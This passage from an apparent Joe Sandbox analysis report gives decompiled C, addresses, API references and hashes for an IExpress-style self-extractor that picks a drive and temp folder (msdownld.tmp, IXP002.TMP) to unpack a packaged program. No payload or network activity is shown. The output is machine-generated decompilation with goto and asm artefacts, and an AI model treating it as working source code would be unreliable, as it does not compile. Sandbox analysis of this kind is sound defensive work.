                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E00BC468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E00BC468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0xbc9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0xbc8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0xbc8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E00BC6517(_t82, 0x7d2, 0, E00BC3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xbc9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0xbc91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0xbc91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E00BC1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E00BC6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E00BC597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E00BC2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E00BC658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xbc91e4;
                                                                                                                                                                                                        																					E00BC1781(0xbc91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E00BC5467(0xbc91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E00BC2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E00BC597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E00BC5467(0xbc91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xbc91e4;
                                                                                                                                                                                                        											_t70 = E00BC2630(0, 0xbc91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xbc91e4;
                                                                                                                                                                                                        												_t71 = E00BC5467(0xbc91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E00BC597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xbc8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E00BC5467(0xbc8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E00BC44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xbc9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E00BC6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}





































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5747
                                                                                                                                                                                                        0x00bc5747
                                                                                                                                                                                                        0x00bc574d
                                                                                                                                                                                                        0x00bc574f
                                                                                                                                                                                                        0x00bc5771
                                                                                                                                                                                                        0x00bc5771
                                                                                                                                                                                                        0x00bc5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5751
                                                                                                                                                                                                        0x00bc5751
                                                                                                                                                                                                        0x00bc5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5755
                                                                                                                                                                                                        0x00bc575b
                                                                                                                                                                                                        0x00bc5760
                                                                                                                                                                                                        0x00bc5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5764
                                                                                                                                                                                                        0x00bc5764
                                                                                                                                                                                                        0x00bc5769
                                                                                                                                                                                                        0x00bc577e
                                                                                                                                                                                                        0x00bc577e
                                                                                                                                                                                                        0x00bc5781
                                                                                                                                                                                                        0x00bc5788
                                                                                                                                                                                                        0x00bc578d
                                                                                                                                                                                                        0x00bc578f
                                                                                                                                                                                                        0x00bc57b2
                                                                                                                                                                                                        0x00bc57b8
                                                                                                                                                                                                        0x00bc57bd
                                                                                                                                                                                                        0x00bc57bf
                                                                                                                                                                                                        0x00bc57cd
                                                                                                                                                                                                        0x00bc57cd
                                                                                                                                                                                                        0x00bc57dd
                                                                                                                                                                                                        0x00bc57e3
                                                                                                                                                                                                        0x00bc57ef
                                                                                                                                                                                                        0x00bc57f5
                                                                                                                                                                                                        0x00bc57f8
                                                                                                                                                                                                        0x00bc580a
                                                                                                                                                                                                        0x00bc580a
                                                                                                                                                                                                        0x00bc57fa
                                                                                                                                                                                                        0x00bc5802
                                                                                                                                                                                                        0x00bc5802
                                                                                                                                                                                                        0x00bc580d
                                                                                                                                                                                                        0x00bc580f
                                                                                                                                                                                                        0x00bc5830
                                                                                                                                                                                                        0x00bc5836
                                                                                                                                                                                                        0x00bc583d
                                                                                                                                                                                                        0x00bc584b
                                                                                                                                                                                                        0x00bc5851
                                                                                                                                                                                                        0x00bc5855
                                                                                                                                                                                                        0x00bc585a
                                                                                                                                                                                                        0x00bc585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00bc5811
                                                                                                                                                                                                        0x00bc5817
                                                                                                                                                                                                        0x00bc5819
                                                                                                                                                                                                        0x00bc581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc581f
                                                                                                                                                                                                        0x00bc5791
                                                                                                                                                                                                        0x00bc5797
                                                                                                                                                                                                        0x00bc579c
                                                                                                                                                                                                        0x00bc579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc57a0
                                                                                                                                                                                                        0x00bc57a9
                                                                                                                                                                                                        0x00bc57ae
                                                                                                                                                                                                        0x00bc57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc57b0
                                                                                                                                                                                                        0x00bc579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5769
                                                                                                                                                                                                        0x00bc5762
                                                                                                                                                                                                        0x00bc5753
                                                                                                                                                                                                        0x00bc574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56c3
                                                                                                                                                                                                        0x00bc56c5
                                                                                                                                                                                                        0x00bc56c9
                                                                                                                                                                                                        0x00bc56ce
                                                                                                                                                                                                        0x00bc56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56d6
                                                                                                                                                                                                        0x00bc56d6
                                                                                                                                                                                                        0x00bc56d8
                                                                                                                                                                                                        0x00bc56dd
                                                                                                                                                                                                        0x00bc56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56e1
                                                                                                                                                                                                        0x00bc56e2
                                                                                                                                                                                                        0x00bc56e4
                                                                                                                                                                                                        0x00bc56e6
                                                                                                                                                                                                        0x00bc56eb
                                                                                                                                                                                                        0x00bc56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc586c
                                                                                                                                                                                                        0x00bc5878
                                                                                                                                                                                                        0x00bc587e
                                                                                                                                                                                                        0x00bc5882
                                                                                                                                                                                                        0x00bc5883
                                                                                                                                                                                                        0x00bc5889
                                                                                                                                                                                                        0x00bc588e
                                                                                                                                                                                                        0x00bc588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5896
                                                                                                                                                                                                        0x00bc56ed
                                                                                                                                                                                                        0x00bc56df
                                                                                                                                                                                                        0x00bc56d0
                                                                                                                                                                                                        0x00bc56c1
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00BC55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00BC5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00BC5620
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00BC571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00BC5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00BC57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00BC57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00BC5802
                                                                                                                                                                                                          • Part of subcall function 00BC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00BC2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00BC5830
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                          • Part of subcall function 00BC6517: LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                          • Part of subcall function 00BC6517: DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00BC5878
                                                                                                                                                                                                          • Part of subcall function 00BC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00BC59A8
                                                                                                                                                                                                          • Part of subcall function 00BC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00BC59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-3708386018
                                                                                                                                                                                                        • Opcode ID: 741a11153c94a07b17648c2733ef2dd035aacda32bc076d935972dcea3d95e9d
                                                                                                                                                                                                        • Instruction ID: 2474df7549ab6fba4ba1e021644ce5e4f5fb7bad5ae3da80fa9e21889b2aad5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 741a11153c94a07b17648c2733ef2dd035aacda32bc076d935972dcea3d95e9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C811871A04A089ADB34AB758C85FEE72EDDB65344F0400EEF586E3191DF74AEC18A60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph: function 00BC597D (legend: Executed / Not Executed)
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00BC597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                                        				signed short _t78;
                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				int _t102;
                                                                                                                                                                                                        				unsigned int _t103;
                                                                                                                                                                                                        				unsigned int _t105;
                                                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                                                        				long _t112;
                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t114 = __edi;
                                                                                                                                                                                                        				_t46 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                        				_v804 = __edx;
                                                                                                                                                                                                        				_t118 = __ecx;
                                                                                                                                                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					_v796 = 0;
                                                                                                                                                                                                        					_v792 = 0;
                                                                                                                                                                                                        					_v800 = 0;
                                                                                                                                                                                                        					_v808 = 0;
                                                                                                                                                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                        						L29:
                                                                                                                                                                                                        						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                        						 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                        						_t110 = 0x4b0;
                                                                                                                                                                                                        						L30:
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						E00BC44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                        						_pop(_t114);
                                                                                                                                                                                                        						goto L33;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t69 = _v792 * _v796;
                                                                                                                                                                                                        					_v812 = _t69;
                                                                                                                                                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                        					__eflags = _t116;
                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                        						goto L29;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                        					__eflags = _t73;
                                                                                                                                                                                                        					if(_t73 != 0) {
                                                                                                                                                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                        						_t101 =  &_v16;
                                                                                                                                                                                                        						_t111 = 6;
                                                                                                                                                                                                        						_t119 = _t118 - _t101;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                        							__eflags = _t22;
                                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                                        							if(_t87 == 0) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t101 = _t87;
                                                                                                                                                                                                        							_t101 = _t101 + 1;
                                                                                                                                                                                                        							_t111 = _t111 - 1;
                                                                                                                                                                                                        							__eflags = _t111;
                                                                                                                                                                                                        							if(_t111 != 0) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t111;
                                                                                                                                                                                                        						if(_t111 == 0) {
                                                                                                                                                                                                        							_t101 = _t101 - 1;
                                                                                                                                                                                                        							__eflags = _t101;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t101 = 0;
                                                                                                                                                                                                        						_t112 = 0x200;
                                                                                                                                                                                                        						_t102 = _v812;
                                                                                                                                                                                                        						_t78 = 0;
                                                                                                                                                                                                        						_t118 = 8;
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							__eflags = _t102 - _t112;
                                                                                                                                                                                                        							if(_t102 == _t112) {
                                                                                                                                                                                                        								break;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t112 = _t112 + _t112;
                                                                                                                                                                                                        							_t78 = _t78 + 1;
                                                                                                                                                                                                        							__eflags = _t78 - _t118;
                                                                                                                                                                                                        							if(_t78 < _t118) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t78 - _t118;
                                                                                                                                                                                                        						if(_t78 != _t118) {
                                                                                                                                                                                                        							__eflags =  *0xbc9a34 & 0x00000008;
